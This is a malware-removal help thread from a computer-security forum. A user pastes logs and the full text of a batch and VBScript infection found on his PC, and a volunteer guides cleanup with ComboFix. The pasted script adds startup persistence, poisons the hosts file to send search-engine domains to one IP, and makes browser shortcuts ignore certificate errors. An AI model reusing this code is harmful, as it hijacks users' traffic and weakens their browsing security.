Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Malware/rootkit connecting to external IP, halp me please?


  • This topic is locked This topic is locked
18 replies to this topic

#1 tomfullerton

tomfullerton

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 22 January 2015 - 11:23 PM

Hello everyone,
 
I'd like some help with what I think is some sort of malware/rootkit that has infected my pc.
I think I need to do a series of thorough scans since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up a "open file with" window right after I booted. I never clicked open and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64 and I also did all scans with malwarebytes, roguekiller64, microsoft essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename Adobe Speed Launcher which I don't quite like and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.
 
-I'm very confident that this is some sort of malware.
The reason being is that this has never happened before, and there are 5 instances of said window when I just boot up. This has never happened before, and the other clue that this is not some legit program is that under the "Program/File" name I see MY first name and that just can't be right.
 
-I've found also found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here: https://www.virustot...sis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead on some sort of malware trying to connect to some ip address that's not even mine: 69.162.120.131
 
 
UPDATE:
 
Now this is probably bad.
 
Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player" which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt
 
I also scanned this with VirusTotal and these are the results: https://www.virustot...sis/1421975128/
 
Someone gotta help me get rid of this stuff that apparently none of the tools I've used so far has detected anything...
 
 
-pasted roguekiller report AND mbam log, FRST, Addition, OTL reports
 
 
 
 
 
RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015 11:25:29
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\Windows\System32\drivers\etc\hosts] ::1 localhost
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )
 
 
============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log
 
 
 
Thank you!

Attached Files



BC AdBot (Login to Remove)

 


m

#2 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 23 January 2015 - 10:38 AM

Hello TomFullerton-

 

My name is Johnny Computer and I will be helping you clean up your system. 

 

PLEASE NOTE:  Logs are often long, complicated, and time consuming to analyze

 

Please give me some time to look over your logs and I will be back with further instructions A.S.A.P.   :) 


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#3 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 24 January 2015 - 12:36 AM

Hello again, I am really interested in what this script does as I think is trying to connect to an ip that is NOT mine or in my network.
 
Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.
 
@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs

 



#4 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 24 January 2015 - 10:21 AM

Hi TomFullerton-
 
 


Hello and    :welcome:   to BLEEPING COMPUTER

My name is Johnny Computer and I will be helping you with your malware related computer issues today   

Before we move on, please read the following points carefully.

 
§  First, I would like to inform you that most of us here at Bleeping Computer are volunteers. The logs you will be asked to submit can take time to analyze. Please try to match our commitment to you with your patience toward us.
§  Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
§  IMPORTANT-----> Post all logfiles as a reply rather than as an attachment. If you can not post all log files in one reply, feel free to use more posts.
§  Perform everything in the correct order. Sometimes one step requires the previous one.
§  If you have any problems while following my instructions, Stop and ask any questions you may have.
§  Please stay with me until I have notified you that your system is All Clean. Absence of symptoms does not necessarily mean your machine is clean.  
§  If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
§  IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.
DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable 

 
  --------------------------------------------------------------------------------------------
 

 P2P/TORRENT WARNING

 
Going over your logs I noticed that you have uTorrent installed.
 
§  Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
§  They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
§  Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
§  The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
 

It is pretty much certain that if you continue to use P2P programs, you will get infected again.


I would recommend that you uninstall uTorrent, however that choice is up to you  If you wish to keep it, please do not use it until your computer is cleaned.

 
 --------------------------------------------------------------------------------------------------------------------------------------------------------------------
 

Does anyone around here have any clue what this script is doing?

This script s definitely malicious and is patching your host file and some shortcuts.  Let's see if we can find some more components that belong to it.
 ----------------------------------------------------------------------------------------------------------------------
 
PLEASE DO THE FOLLOWING:
  • Now please download Combofix from here.

  • Save it to your Desktop.

  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. Please refer to this link for instructions.

  • Double click it & follow the prompts.

  • If you receive a UAC prompt asking if you want to continue running the program, you should press the Continue button.

  • Click on Yes, to continue scanning for malware.

  • When finished, it will produce a log for you.

  • Please include the C:\ComboFix.txt in your next reply.

  • Note: After running Combofix, you may receive an error about "illegal operation on a registry key that has been marked for deletion." If you receive this error, please reboot and it should disappear.
Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock.
 
---------------------------------------------------------------------------------------------------------------
 
IN YOUR NEXT REPLY I NEED:
 
1.)  Your Combofix log
 
Thanks   :)

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#5 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 24 January 2015 - 12:37 PM

Hello again good sir, apparently all my other forum posts on forums such as malwaretips and malwarebytes were close since "no more than 1 person can try and help me" so props to twinheadedhomo for that.

 

Anyway you're my last hope and I have attached the combofix log

 

Thank you in advance!

Attached Files



#6 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 25 January 2015 - 08:34 AM

Hello TomFullerton-

 

As requested in my welcome speech   

 

IMPORTANT-----> Post all logfiles as a reply rather than as an attachment. If you can not post all log files in one reply, feel free to use more posts.

 

 

-------------------------------------------------------------------------------------------------------------------------------------------------------

 

We need to run a combofix script.  Please do the following:

 

§  Close any open browsers.

§  Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

§  Open Notepad and copy/paste the text below into the Notepad document

    

Registry::
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Adobe Speed Launcher"=-

§  Save this on your desktop as CFScript.txt

 

CFScriptB-4.gif

 

§  Referring to the picture above, drag CFScript.txt into ComboFix.exe

§  When finished, it will create a log for you at C:\ComboFix.txt. Please copy/paste the information in your next reply.

 

 ------------------------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

 

1.) Your Combofix log

2.)  How is your system running now?  Are you experiencing all, some, or none of the previous issues?

 

 

Thanks :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#7 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 25 January 2015 - 07:16 PM

Hello again,

 

1. -I had to change the registry key from RunOnce to runonce since the prior did not exist. Other than that here's the report combofix generated:

2. -The file is still there, the "Tom" file in C:\Users. I ought to delete it.

 

 

 

 

ComboFix 15-01-22.02 - Tom Jones 01/25/2015  19:05:35.2.8 - x64
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.16351.13584 [GMT -5:00]
Running from: c:\users\Tom Jones\Downloads\ComboFix.exe
Command switches used :: c:\users\Tom Jones\Downloads\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Disabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((   Files Created from 2014-12-26 to 2015-01-26  )))))))))))))))))))))))))))))))
.
.
2015-01-26 00:07 . 2015-01-26 00:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2015-01-25 23:56 . 2015-01-25 23:56 -------- d-----w- c:\users\Tom Jones\AppData\Roaming\JetBrains
2015-01-25 06:53 . 2014-12-02 10:26 11870360 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{EEAA395E-0928-4A6F-B6C4-52C7DC6E3B95}\mpengine.dll
2015-01-25 01:11 . 2015-01-25 01:11 -------- d-----w- c:\program files (x86)\Common Files\Java
2015-01-24 17:40 . 2014-12-02 10:26 11870360 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-01-23 17:35 . 2015-01-23 17:35 -------- d-----w- C:\_OTL
2015-01-23 01:49 . 2015-01-24 05:17 -------- d-----w- C:\AdwCleaner
2015-01-23 01:00 . 2015-01-24 01:49 -------- d-----w- C:\FRST
2015-01-22 05:05 . 2015-01-22 05:05 -------- d-----w- c:\users\Tom Jones\.jmc
2015-01-22 04:50 . 2015-01-23 02:10 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2015-01-22 03:33 . 2015-01-22 16:23 37624 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2015-01-22 03:33 . 2015-01-22 03:33 -------- d-----w- c:\programdata\RogueKiller
2015-01-22 02:54 . 2014-09-17 01:56 1188440 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{14144F4D-F194-4E37-A55E-30624807F987}\gapaengine.dll
2014-12-27 18:56 . 2015-01-24 17:23 -------- d-----w- c:\users\Tom%20Jones
2014-12-27 03:56 . 2014-12-27 03:57 -------- d-----w- c:\users\Tom Jones\.gradle
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-01-25 07:22 . 2014-07-01 05:35 129752 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-01-25 01:11 . 2014-02-22 18:06 111016 ----a-w- c:\windows\system32\WindowsAccessBridge-64.dll
2015-01-25 01:11 . 2014-02-22 18:06 319912 ----a-w- c:\windows\system32\javaws.exe
2015-01-25 01:11 . 2014-02-22 18:06 191400 ----a-w- c:\windows\system32\javaw.exe
2015-01-25 01:11 . 2014-02-22 18:06 190888 ----a-w- c:\windows\system32\java.exe
2015-01-25 01:11 . 2014-10-21 02:28 98216 ----a-w- c:\windows\SysWow64\WindowsAccessBridge-32.dll
2015-01-23 02:11 . 2014-07-01 05:35 97496 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2015-01-23 01:55 . 2014-05-05 05:51 701616 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2015-01-23 01:55 . 2012-07-03 18:41 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-12-31 11:14 . 2010-11-21 03:27 298120 ------w- c:\windows\system32\MpSigStub.exe
2014-12-13 05:09 . 2014-12-18 15:28 144384 ----a-w- c:\windows\system32\ieUnatt.exe
2014-12-13 03:33 . 2014-12-18 15:28 115712 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-11-27 01:43 . 2014-12-10 01:43 389296 ----a-w- c:\windows\system32\iedkcs32.dll
2014-11-22 03:13 . 2014-12-10 01:43 25059840 ----a-w- c:\windows\system32\mshtml.dll
2014-11-22 03:06 . 2014-12-10 01:43 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-11-22 03:06 . 2014-12-10 01:43 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-11-22 02:50 . 2014-12-10 01:43 66560 ----a-w- c:\windows\system32\iesetup.dll
2014-11-22 02:50 . 2014-12-10 01:43 580096 ----a-w- c:\windows\system32\vbscript.dll
2014-11-22 02:49 . 2014-12-10 01:43 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-11-22 02:49 . 2014-12-10 01:43 2885120 ----a-w- c:\windows\system32\iertutil.dll
2014-11-22 02:48 . 2014-12-10 01:43 88064 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-11-22 02:41 . 2014-12-10 01:43 54784 ----a-w- c:\windows\system32\jsproxy.dll
2014-11-22 02:40 . 2014-12-10 01:43 34304 ----a-w- c:\windows\system32\iernonce.dll
2014-11-22 02:37 . 2014-12-10 01:43 633856 ----a-w- c:\windows\system32\ieui.dll
2014-11-22 02:35 . 2014-12-10 01:43 114688 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-11-22 02:34 . 2014-12-10 01:43 814080 ----a-w- c:\windows\system32\jscript9diag.dll
2014-11-22 02:34 . 2014-12-10 01:43 6039552 ----a-w- c:\windows\system32\jscript9.dll
2014-11-22 02:26 . 2014-12-10 01:43 968704 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-11-22 02:22 . 2014-12-10 01:43 490496 ----a-w- c:\windows\system32\dxtmsft.dll
2014-11-22 02:20 . 2014-12-10 01:43 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-11-22 02:14 . 2014-12-10 01:43 77824 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-11-22 02:09 . 2014-12-10 01:43 199680 ----a-w- c:\windows\system32\msrating.dll
2014-11-22 02:08 . 2014-12-10 01:43 92160 ----a-w- c:\windows\system32\mshtmled.dll
2014-11-22 02:07 . 2014-12-10 01:43 501248 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-11-22 02:07 . 2014-12-10 01:43 62464 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-11-22 02:06 . 2014-12-10 01:43 47616 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-11-22 02:05 . 2014-12-10 01:43 64000 ----a-w- c:\windows\SysWow64\MshtmlDac.dll
2014-11-22 02:05 . 2014-12-10 01:43 316928 ----a-w- c:\windows\system32\dxtrans.dll
2014-11-22 01:54 . 2014-12-10 01:43 620032 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-11-22 01:49 . 2014-12-10 01:43 718848 ----a-w- c:\windows\system32\ie4uinit.exe
2014-11-22 01:49 . 2014-12-10 01:43 800768 ----a-w- c:\windows\system32\msfeeds.dll
2014-11-22 01:47 . 2014-12-10 01:43 1359360 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-11-22 01:46 . 2014-12-10 01:43 2125312 ----a-w- c:\windows\system32\inetcpl.cpl
2014-11-22 01:43 . 2014-12-10 01:43 14412800 ----a-w- c:\windows\system32\ieframe.dll
2014-11-22 01:40 . 2014-12-10 01:43 60416 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-11-22 01:29 . 2014-12-10 01:43 4299264 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-11-22 01:28 . 2014-12-10 01:43 2358272 ----a-w- c:\windows\system32\wininet.dll
2014-11-22 01:22 . 2014-12-10 01:43 2052096 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-11-22 01:21 . 2014-12-10 01:43 1155072 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-11-22 01:15 . 2014-12-10 01:43 1548288 ----a-w- c:\windows\system32\urlmon.dll
2014-11-22 01:03 . 2014-12-10 01:43 800768 ----a-w- c:\windows\system32\ieapfltr.dll
2014-11-22 01:00 . 2014-12-10 01:43 1888256 ----a-w- c:\windows\SysWow64\wininet.dll
2014-11-21 11:14 . 2014-07-01 05:35 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-11-21 11:14 . 2012-06-09 21:16 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-11-18 20:02 . 2014-12-26 04:58 84992 ----a-w- c:\windows\system32\drivers\IntelHaxm.sys
2014-11-11 03:09 . 2014-12-10 01:42 1424384 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-11-11 03:08 . 2014-11-19 14:36 241152 ----a-w- c:\windows\system32\pku2u.dll
2014-11-11 03:08 . 2014-11-19 14:36 728064 ----a-w- c:\windows\system32\kerberos.dll
2014-11-11 02:44 . 2014-12-10 01:42 1230336 ----a-w- c:\windows\SysWow64\WindowsCodecs.dll
2014-11-11 02:44 . 2014-11-19 14:36 186880 ----a-w- c:\windows\SysWow64\pku2u.dll
2014-11-11 02:44 . 2014-11-19 14:36 550912 ----a-w- c:\windows\SysWow64\kerberos.dll
2014-11-11 01:46 . 2014-12-10 01:42 119296 ----a-w- c:\windows\system32\drivers\tdx.sys
2014-11-08 03:16 . 2014-12-10 01:42 2048 ----a-w- c:\windows\system32\tzres.dll
2014-11-08 02:45 . 2014-12-10 01:42 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2014-10-30 02:03 . 2014-12-10 01:42 165888 ----a-w- c:\windows\system32\charmap.exe
2014-10-30 01:45 . 2014-12-10 01:42 155136 ----a-w- c:\windows\SysWow64\charmap.exe
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
